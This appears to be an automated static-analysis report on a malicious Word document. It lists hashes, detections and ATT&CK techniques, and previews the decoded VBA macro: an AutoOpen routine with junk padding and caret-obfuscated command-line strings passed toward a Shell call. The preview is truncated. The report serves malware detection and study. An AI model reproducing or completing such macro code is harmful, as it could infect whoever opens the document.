Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4ff395f66084cbaf…

MALICIOUS

Office (OLE)

137.4 KB Created: 2018-10-02 10:52:00 Authoring application: Microsoft Office Word First seen: 2019-05-10
MD5: bb6acf26d694dbc5908cf5cc90439b65 SHA-1: a40c007d2e89068464193af1cc5b4227e5dbce11 SHA-256: 4ff395f66084cbaf35c211558c86767a822455346129d19368ea0a910e159b50
202 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. The macro utilizes a Shell() call, indicating an attempt to execute arbitrary code. While the specific payload is obfuscated, the presence of the Shell() call and the AutoOpen macro strongly suggests the document is designed to download and execute a second-stage payload.

Heuristics 6

  • ClamAV: Doc.Malware.00536d-6704725-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.00536d-6704725-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 92673 bytes
SHA-256: 05f69ac3e4aa3db44c874b48a1894d755b11ab27f2f0403d09429e1cbbaea376
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "HTcojPoTOPX"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   If KXsQqW Or zCfiw Then

Dim WmYBwV(3)
WmYBwV(0) = MmNMwi + 81550
WmYBwV(1) = 29721 + BYhczw + 71176 + 71291
WmYBwV(2) = 66500 + QGYju

End If
   If UwnoCQ >= WijVK Then

Dim JmJHHt(4)
JmJHHt(0) = 34352 + wPnnzp
JmJHHt(1) = jUnTFN + whHpHX
JmJHHt(2) = 37509 + AUsnm + tlHXw + WizADa
JmJHHt(3) = mOwCF + UpbzR + tRiPTu + Dlqif

End If
   If PSOiG = jzhBER Then

Dim PRXSmp(1)
PRXSmp(0) = ChnTfG + XmwfQH

End If
   If Cbtsf = 7 Then

Dim ukjLC(4)
ukjLC(0) = 13525 + lOYwqJ
ukjLC(1) = iiuCA + INkWoJ
ukjLC(2) = 81451 + 10622 + 28771 + YtKfIw
ukjLC(3) = 14211 + dzvmY + jazrb + jqslw

End If
   If lMdlmr Eqv 3 Then

Dim bNIlSC(2)
bNIlSC(0) = sWFnR + qabRvV + AiQpJP + miDQEi
bNIlSC(1) = JNsoQ + 98790 + cHcoOu + LlLqQz

End If
   If zSbCSi And ToimR Then

Dim MidiWM(4)
MidiWM(0) = WnBvU + asranj
MidiWM(1) = MQaMOj + OonFcd + wDiLu + JaJRji
MidiWM(2) = 41604 + VcOvF
MidiWM(3) = 77963 + wIQQp

End If
WVkbiRrjbQE (KeyString(BtSqncrm + jRMjC + 13 + 2 + 52 + HzUnZ + StFioGTt) + oVPKlEkL + EQskDGi + KeyString(aCbriX + JzRqmN + 15 + 2 + 60 + jBrWskbA + CAVihbj) + TWmifROXE + njqfYwziXL + YBwjC + tMLisfoCm + QuoUGnR + fTwXtZEw + rWFBpLMVtP + HJEIlMK + KmvwiATzX + AwSrqcp + tvUmGI)
   If mzTzW = CtczS Then

Dim ZziWZj(2)
ZziWZj(0) = vCXbiK + 26024
ZziWZj(1) = ktIBB + wtOqh

End If
   If LqsMZK Eqv omCuS Then

Dim EWzrJV(2)
EWzrJV(0) = 26800 + 82988 + fjTABJ + hpzjk
EWzrJV(1) = 58043 + 47556

End If
   If blvCD = uqTpZ Then

Dim uznSo(3)
uznSo(0) = 61077 + LtZIN
uznSo(1) = ENviK + ziWijS + 77570 + FmchMj
uznSo(2) = nrLRww + FcBdh

End If
   If MzIIOc < YPEAAD Then

Dim ZQswd(3)
ZQswd(0) = 38765 + VjQOc + dtjFkF + tnTYzG
ZQswd(1) = 27495 + cGRvu
ZQswd(2) = fLJjD + hqPrt + 74419 + IijwPu

End If
End Sub


Attribute VB_Name = "izmrbFTK"
Function TWmifROXE()
If iVBJdU Xor otOSTd Then

Dim TzjPBB(2)
TzjPBB(0) = 5828 + ZanAb
TzjPBB(1) = 78054 + dWNoQ

End If
   If jHJiR <= 11 Then

Dim sSMVd(2)
sSMVd(0) = UizOXp + afiilk + 34557 + 90075
sSMVd(1) = HFnmk + dbDOzW + mDjEv + 76263

End If
   If iflSj <> BZYuzO Then

Dim LGhqCt(3)
LGhqCt(0) = 9735 + KIsWJ
LGhqCt(1) = 88016 + whpicw + 47980 + CUBkbC
LGhqCt(2) = UwIqaz + NsuNz + Xtvaw + aqEUlc

End If
vwslC = "d /V^:^ON/C" + """" + "^s^" + "e^t ^S^O^Q=^mc^E^ I" + "^m/^ ^DZl^ N^W^~^ " + "^}^[a^ ^u^g^-^"
If ljcriz < HdziXH Then

Dim VbkdVv(1)
VbkdVv(0) = 51808 + ctqYP

End If
   If iMZbG Or jYJUJt Then

Dim JDzRI(4)
JDzRI(0) = AmDnBw + PGjBJ + nDzkFw + mpDbI
JDzRI(1) = 23696 + HMZwZ + WrSbZ + iqiZo
JDzRI(2) = 16171 + YFPKS + UGGKic + ptHDhn
JDzRI(3) = 52975 + OvlXKh

End If
PwiwWcimR = " c^{^=^ W^O^E^" + " ^b4^\ ^J^w^;" + "^ ^y^H(^ ^>Z^D^" + " ^J^>)^ ^b]^m^ }{^L^" + " Y^'\^ ^=R^H^ ^_^j^" + "h^}/^i^Z^}^["
If KmOFvA < 12 Then

Dim RRlVG(3)
RRlVG(0) = 83675 + 53021
RRlVG(1) = 12509 + XPjNN + BRYnmq + 48149
RRlVG(2) = UNtwjt + HXPzN + GTTzk + JURId

End If
   If QPSwn > sBGEEJ Then

Dim hjzvh(4)
hjzvh(0) = ifrAjR + JimHK
hjzvh(1) = 6838 + DuTJfB + PBajWj + OBYPzj
hjzvh(2) = 54564 + YPljc
hjzvh(3) = NPwtBN + nQqPf + SiRQKi + udOsK

End If
   If fVDXz And 18 Then

Dim JBmbq(2)
JBmbq(0) = 41300 + mbkiA + sJtHw + wQskAG
JBmbq(1) = dujRMS + GiRsp + oMZTsj + 85587

End If
fzBJOqCiI = "^?^x^{^F^,%^h^B^" + "[vc^A^S^_^" + "t^W^-^,^a^*^@^\c%^"
If whIOSs Or 18 Then

Dim RINsr(2)
RINsr(0) = GQsUP + ruwEq
RINsr(1) = XPXDF + hRHHa + 28608 + fVbpL

End If
Wtsoj = ">^i^}^s^dx^;Xrn^k^" + "4^l^d^a8^T^_^" + "e^-^i^Mr^W^_r^b^#" + "^G^y^;^3^J^DG^S" + "^P^p^w^H^qT^" + "W(^#^1^$)^U/^ ^"
If PXRccQ <> 1 Then

Dim RNofqd(2)
RNofqd(0) = 68766 + Zuzpp + 82198 + SYNrM
RNofqd(1) = Tshid + 84303

End If
   If Yzohus <> zclSUE Then

Dim pWRDk(2)
pWRDk(0) = FtPkEp + UHwMlw
pWRDk(1) 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.